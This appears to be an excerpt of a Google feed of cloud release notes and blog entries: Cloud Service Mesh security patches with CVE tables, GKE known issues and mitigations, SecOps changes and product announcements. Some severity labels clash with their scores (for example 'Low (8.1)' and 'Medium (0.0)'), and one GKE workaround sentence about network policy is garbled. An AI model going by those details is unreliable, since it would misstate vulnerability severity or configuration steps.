&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (5.9)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-34743&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (5.3)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-45446&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (4.8)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-42770&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (3.7)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-40226&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Medium (0.0)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;1.27.9-asm.8 is now available for in-cluster Cloud Service Mesh.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This patch release contains the fix for the security vulnerability listed in
&lt;a href="https://docs.cloud.google.com/service-mesh/docs/security-bulletins#gcp-2026-040"&gt;GCP-2026-040&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For details on upgrading Cloud Service Mesh, see
&lt;a href="https://docs.cloud.google.com/service-mesh/v1.27/docs/upgrade/upgrade"&gt;Upgrade Cloud Service Mesh&lt;/a&gt;. Cloud Service
Mesh 1.27.9-asm.8 uses Envoy v1.35.13-dev.&lt;/p&gt;
&lt;h3&gt;Fixed&lt;/h3&gt;
&lt;p&gt;This patch release also contain the fixes for the following CVEs:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left;"&gt;CVE&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Proxy&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Control Plane&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Distroless&lt;/th&gt;
&lt;th style="text-align: left;"&gt;CNI&lt;/th&gt;
&lt;th style="text-align: left;"&gt;Severity&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-34182&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Medium (9.1)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-45447&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;High (8.8)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-7383&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (8.1)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-34180&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (7.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-45445&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Medium (7.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-9076&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (7.5)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-42766&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (5.9)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-42767&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (5.9)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-34743&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (5.3)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-45446&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (4.8)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-42770&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Low (3.7)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left;"&gt;CVE-2026-40226&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;No&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Yes&lt;/td&gt;
&lt;td style="text-align: left;"&gt;Medium (0.0)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;The following images are now rolling out for managed Cloud Service Mesh:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sidecar version 1.21.6-asm.38, is rolling out to the rapid release channel.&lt;/li&gt;
&lt;li&gt;Sidecar version 1.20.8-asm.88 is rolling out to the regular release channel.&lt;/li&gt;
&lt;li&gt;Sidecar version 1.19.10-asm.78 is rolling out to the stable release channel.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These patch releases contain the fix for the vulnerability listed in
&lt;a href="https://docs.cloud.google.com/service-mesh/docs/security-bulletins#gcp-2026-040"&gt;GCP-2026-040&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;These rollouts will preempt those previously announced on
&lt;a href="#June_12_2026"&gt;June 12, 2026&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Compute Engine&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Preview&lt;/strong&gt;: You can use Gemini in the Google Cloud console as
an AI-powered interface to evaluate hardware options, estimate deployment costs,
and view recommended configurations for your Compute Engine instances.
Prompting Gemini helps you reach an optimal configuration for
your workload before you create or modify a compute instance. For more
information, see
&lt;a href="https://docs.cloud.google.com/compute/docs/design-with-gemini"&gt;Design your compute infrastructure with Gemini&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise: Observability settings for Deep Research agents (Preview)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You can now configure observability settings for individual Deep Research
agents, the same way as for Agent Designer employee-made agents. This allows
you to monitor metrics in Metrics Explorer and view trace results in
Trace Explorer for specific Deep Research agents.&lt;/p&gt;
&lt;p&gt;Observability for Deep Research agents is enabled via the agent-level
&lt;strong&gt;Observability&lt;/strong&gt; toggle, not the app-level toggle used for the Core Assistant
agent.&lt;/p&gt;
&lt;p&gt;This feature is in Public Preview. For more information, see
&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/manage-observability-settings"&gt;Manage observability settings&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google Kubernetes Engine&lt;/h2&gt;
&lt;h3&gt;Issue&lt;/h3&gt;
&lt;p&gt;For GKE cluster version 1.34.1-gke.3899001 (sidecar mounter image version
1.21.9) and later affected versions, Cloud Storage FUSE volumes might fail to
mount if the GKE metadata service isn't ready when the Cloud Storage FUSE
sidecar initiates.&lt;/p&gt;
&lt;p&gt;When this issue occurs, you might see the following error:&lt;/p&gt;
&lt;pre class="devsite-disable-click-to-copy wrap-code devsite-click-to-copy"&gt;&lt;code&gt;MountVolume.SetUp failed for volume "volume-name" : rpc error: code = Internal desc = the sidecar container terminated due to Error, exit code: 255
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Additionally, the &lt;code&gt;gcsfuse-sidecar&lt;/code&gt; container displays the following error:&lt;/p&gt;
&lt;pre class="devsite-disable-click-to-copy wrap-code devsite-click-to-copy"&gt;&lt;code&gt;Failed to fetch identity pool and identity provider details required for bucket access check, got error Failed to set up metadata service: failed to get project: Get "http://X.X.X.X/computeMetadata/v1/project/project-id": dial tcp 169.254.169.254:80: connect: connection refused for identity pool PROJECT_ID.svc.id.goog and identity provider https://container.googleapis.com/v1/projects/PROJECT_ID/locations/LOCATION/clusters/CLUSTER_NAME
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Mitigation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;To resolve this issue, perform one of the following mitigations:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Upgrade your cluster to one of the following fixed GKE versions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;1.34.8-gke.1218000&lt;/code&gt; or later&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1.35.3-gke.2347000&lt;/code&gt; or later&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1.36.0-gke.1266000&lt;/code&gt; or later.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Create an init container in your Pod that validates metadata service
availability.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Manually inject the sidecar to ensure the sidecar is blocked by an init
container.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For more information, see the &lt;a href="https://github.com/GoogleCloudPlatform/gcs-fuse-csi-driver/blob/main/docs/troubleshooting.md#limitations"&gt;Cloud Storage FUSE CSI driver troubleshooting
guide&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Issue&lt;/h3&gt;
&lt;p&gt;&lt;span id="wi-issue-20260623"&gt;&lt;/span&gt;
In GKE version 1.35 and later, due to faster node startup, workloads that use
Dataplane V2 and Workload Identity Federation for GKE to &lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/workload-identity"&gt;authenticate to Google Cloud
APIs&lt;/a&gt; might experience
transient connectivity timeouts or refused connections to the GKE metadata
server immediately following node startup.&lt;/p&gt;
&lt;p&gt;For recommendations and workarounds
if this impacts your workload (for example, if your workload doesn't retry
requests until they succeed), see &lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/troubleshooting/authentication#troubleshoot-timeout"&gt;Timeout errors at Pod
startup&lt;/a&gt;,
specifically by deploying an &lt;code&gt;initContainer&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Alternatively, add any
that selects no workloads, such as in a namespace with no workloads—to GKE Dataplane V2,
&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/network-policy"&gt;network policy&lt;/a&gt;—including one
which disables the faster node startup.
Improvements are in progress and coming in a future GKE patch.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;[Spotlight Feature] Ask Gemini Cloud Assist in Feed Management&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps now provides Gemini Cloud Assist (GCA) directly within the Feed Management interface. Use the new &lt;strong&gt;Ask Gemini Cloud Assist&lt;/strong&gt; button to get help with feed creation, setup, and general troubleshooting questions.&lt;/p&gt;
&lt;p&gt;Click &lt;strong&gt;Ask Gemini Cloud Assist&lt;/strong&gt; to open the Gemini Cloud Assist panel and ask questions to get guidance on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Configuring and managing data feeds.&lt;/li&gt;
&lt;li&gt;Understanding ingestion pre-requisites and setup steps for different log sources.&lt;/li&gt;
&lt;li&gt;Resolving common setup issues.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;Note: Gemini Cloud Assist provides recommendations and answers to your questions, but does not perform configuration changes on your behalf. You must apply any recommended changes manually to your feeds.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/administration/feed-management-overview"&gt;Feed management overview&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Ingestion metrics reporting correction&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google Security Operations has resolved an issue where certain ingestion metrics—which are displayed in both the dashboard and Cloud Monitoring—were under-reported.&lt;/p&gt;
&lt;p&gt;Because of this correction, you might notice a one-time apparent spike in your ingestion metrics when the update is enabled for your region (between June 29 and July 10, 2026). The actual log volume ingested remains unchanged.&lt;/p&gt;
&lt;p&gt;Historical metrics recorded before this update will not be modified or backfilled. This correction does not affect customer billing.&lt;/p&gt;
&lt;p&gt;If you have questions or need assistance, contact Google Security Operations support.&lt;/p&gt;
&lt;h3&gt;Breaking&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Critical Notice: Upcoming reservation of siemAlertId field&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Effective July 5, 2026, the &lt;code&gt;siemAlertId&lt;/code&gt; field will be strictly reserved for
internal Chronicle SIEM alert IDs.&lt;/p&gt;
&lt;p&gt;Starting July 5, the system will automatically overwrite any custom or
user-supplied data passed through this field. This change impacts all ingestion
methods, including the Ingestion API, webhooks, and both first-party and
third-party connectors. If you are currently utilizing a custom field named
&lt;code&gt;siemAlertId&lt;/code&gt; in any of your data ingestion configurations, please migrate to a
different field name immediately to prevent data loss.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SIEM&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Ask Gemini Cloud Assist in Feed Management&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps now provides Gemini Cloud Assist (GCA) directly within the Feed Management interface to help you with feed creation, setup, and general troubleshooting questions.&lt;/p&gt;
&lt;p&gt;A new &lt;strong&gt;Ask Gemini Cloud Assist&lt;/strong&gt; button is now available in the Feed Management interface. You can click this button to open the Gemini Cloud Assist panel and ask questions to get guidance on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Configuring and managing data feeds.&lt;/li&gt;
&lt;li&gt;Understanding ingestion pre-requisites and setup steps for different log sources.&lt;/li&gt;
&lt;li&gt;Resolving common setup issues.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;Note: Gemini Cloud Assist provides recommendations and answers to your questions, but does not perform configuration changes on your behalf. You must apply any recommended changes manually to your feeds.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/administration/feed-management-overview"&gt;Feed management overview&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Ingestion metrics reporting correction&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google Security Operations has resolved an issue where certain ingestion metrics—which are displayed in both the dashboard and Cloud Monitoring—were under-reported.&lt;/p&gt;
&lt;p&gt;Because of this correction, you might notice a one-time apparent spike in your ingestion metrics when the update is enabled for your region (between June 29 and July 10, 2026). The actual log volume ingested remains unchanged.&lt;/p&gt;
&lt;p&gt;Historical metrics recorded before this update will not be modified or backfilled. This correction does not affect customer billing.&lt;/p&gt;
&lt;p&gt;If you have questions or need assistance, contact Google Security Operations support.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Breaking&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Critical Notice: Upcoming reservation of siemAlertId field&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Effective July 5, 2026, the &lt;code&gt;siemAlertId&lt;/code&gt; field will be strictly reserved for
internal Chronicle SIEM alert IDs. &lt;/p&gt;
&lt;p&gt;Starting July 5, the system will automatically overwrite any custom or
user-supplied data passed through this field. This change impacts all ingestion
methods, including the Ingestion API, webhooks, and both first-party and
third-party connectors. If you are currently utilizing a custom field named 
&lt;code&gt;siemAlertId&lt;/code&gt; in any of your alert ingestion configurations, please
migrate to a different field name immediately to prevent data loss.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Knowledge Catalog&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can control data lineage ingestion for BigQuery and Managed Service for Apache Airflow at the organization, folder, or project level. This feature is available in &lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;preview&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/dataplex/docs/about-data-lineage#control-lineage-ingestion"&gt;Control data ingestion&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;SAP on Google Cloud&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;ABAP SDK for Google Cloud version 1.14 (On-premises or any cloud edition)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Version 1.14 of the on-premises or any cloud edition of the ABAP SDK for Google
Cloud is generally available (GA).&lt;/p&gt;
&lt;p&gt;This version resolves an issue that occurred during signature verification for Cloud Storage content repository and removes an unreferenced node from the SPRO configuration menu.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/sap/docs/abap-sdk/on-premises-or-any-cloud/whats-new#version-1-14"&gt;What's new with the ABAP SDK for Google Cloud&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;BigQuery Connector for SAP version 2.15&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Version 2.15 of the BigQuery Connector for SAP is generally available (GA).
This version resolves issues related to column descriptions in standalone SLT
system configurations and attribute consistency in Pub/Sub messages during
Change Data Capture (CDC) replication.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/sap/docs/bq-connector/whats-new#version-2-15"&gt;What's new with BigQuery Connector for SAP&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Sensitive Data Protection&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/sensitive-data-protection/docs/infotypes-reference#image-context"&gt;Image safety classification infoTypes&lt;/a&gt; are now supported in &lt;code&gt;&lt;a href="https://cloud.google.com/sensitive-data-protection/docs/reference/rest/v2/InspectConfig#excludebyimagefindings"&gt;ExcludeByImageFindings&lt;/a&gt;&lt;/code&gt; and &lt;code&gt;&lt;a href="https://cloud.google.com/sensitive-data-protection/docs/reference/rest/v2/InspectConfig#adjustbyimagefindings"&gt;AdjustByImageFindings&lt;/a&gt;&lt;/code&gt; detection rules.&lt;/p&gt;
&lt;p&gt;For information about configuring these rules, see &lt;a href="https://docs.cloud.google.com/sensitive-data-protection/docs/creating-custom-infotypes-rules"&gt;Modifying infoType detectors
to refine scan results&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Spanner&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Spanner supports
&lt;a href="https://docs.cloud.google.com/spanner/docs/latency-points#direct_connectivity"&gt;direct connectivity&lt;/a&gt;.
When enabled, your application traffic is routed directly to
Spanner servers, bypassing the Google Front End (GFE) servers.
This can reduce your overall latency.
Direct connectivity is
&lt;a href="https://docs.cloud.google.com/products#product-launch-stages"&gt;generally available (GA)&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Virtual Private Cloud&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;General Availability&lt;/strong&gt;: Service consumers can authorize Private Service
Connect interfaces to connect to network attachments by adding service class IDs
to a network attachment's accept list.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/vpc/docs/about-network-attachments#connection-policies"&gt;Authorization policies&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_23_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-23T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/rozszerzamy-program-weryfikowania-reklamodawcow-uslug-finansowych-w-europie</id>
    <title>Rozszerzamy program weryfikowania reklamodawców usług finansowych w Europie</title>
    <updated>2026-06-23T06:00:00+00:00</updated>
    <content type="html">Zdjęcie obrazujące zabezpieczenia</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/rozszerzamy-program-weryfikowania-reklamodawcow-uslug-finansowych-w-europie" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-23T06:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/rozszerzamy-program-weryfikowania-reklamodawcow-uslug-finansowych-w-europie/</id>
    <title>Rozszerzamy program weryfikowania reklamodawców usług finansowych w Europie</title>
    <updated>2026-06-23T06:00:00+00:00</updated>
    <content type="html">Zdjęcie obrazujące zabezpieczenia</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/rozszerzamy-program-weryfikowania-reklamodawcow-uslug-finansowych-w-europie/" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-23T06:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/ads-commerce/eu-financial-advertiser-verification/</id>
    <title>Expanding financial advertiser verification across Europe</title>
    <updated>2026-06-23T05:00:00+00:00</updated>
    <content type="html">Blue shield with a lock on it, all in front of various computer windows</content>
    <link href="https://blog.google/products/ads-commerce/eu-financial-advertiser-verification/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-23T05:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/arts-culture/colonial-williamsburg/</id>
    <title>Explore Colonial Williamsburg with Google Arts &amp; Culture</title>
    <updated>2026-06-22T20:00:00+00:00</updated>
    <content type="html">An aerial view shows the formal gardens and geometric hedgerows of the Governor's Palace in Williamsburg, Virginia, set against a large brick building under a cloudy sky.</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/arts-culture/colonial-williamsburg/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-22T20:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/developers-tools/interactions-api-general-availability/</id>
    <title>Interactions API: our primary interface for Gemini models and agents</title>
    <updated>2026-06-22T17:15:00+00:00</updated>
    <content type="html">Interactions API</content>
    <link href="https://blog.google/innovation-and-ai/technology/developers-tools/interactions-api-general-availability/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-22T17:15:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/python-udf-in-bigquery-now-generally-available</id>
    <title>Boost BigQuery with Python: Managed Python UDFs now generally available</title>
    <updated>2026-06-22T17:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;SQL is the industry standard for high-performance structured data analysis. However, expressing complex procedural logic, scientific computations, advanced string manipulations, or machine learning workflows in pure SQL can be highly challenging, if not impossible. That kind of work is better done with Python. Data practitioners often take on additional infrastructure management tasks &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;—&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; maintaining custom images and containers, and working with additional compute services — just to run simple helper functions with custom Python code and libraries. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span&gt;&lt;span style="vertical-align: baseline;"&gt;Today, we are thrilled to announce the general availability (GA) of&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/user-defined-functions-python"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery Managed Python User-Defined Functions (UDFs)&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This launch represents a major milestone in BigQuery’s extensibility strategy, allowing data scientists, engineers, and analysts to execute custom Python code directly and securely inside BigQuery using standard SQL queries or &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/bigquery-dataframes-introduction"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery DataFrames&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (BigFrames) in Python. With this release, Python UDFs are fully supported for production enterprise workloads and completely integrated into BigQuery's billing SKUs. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Bridging SQL and the Rich Python Ecosystem&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;BigQuery Managed Python UDFs run on BigQuery-managed serverless resources that automatically scales to billions of rows, without having to set up infrastructure or manage containers. BigQuery automatically handles the compilation, image building, security patching, deployment, and execution of your Python code, making it super simple to use Python functions in your SQL.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Core benefits&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Flexibility:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Access the vast Python ecosystem — including top-tier scientific and mathematical libraries like NumPy, SciPy, pandas, scikit-learn and more — directly in your SQL select statements.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
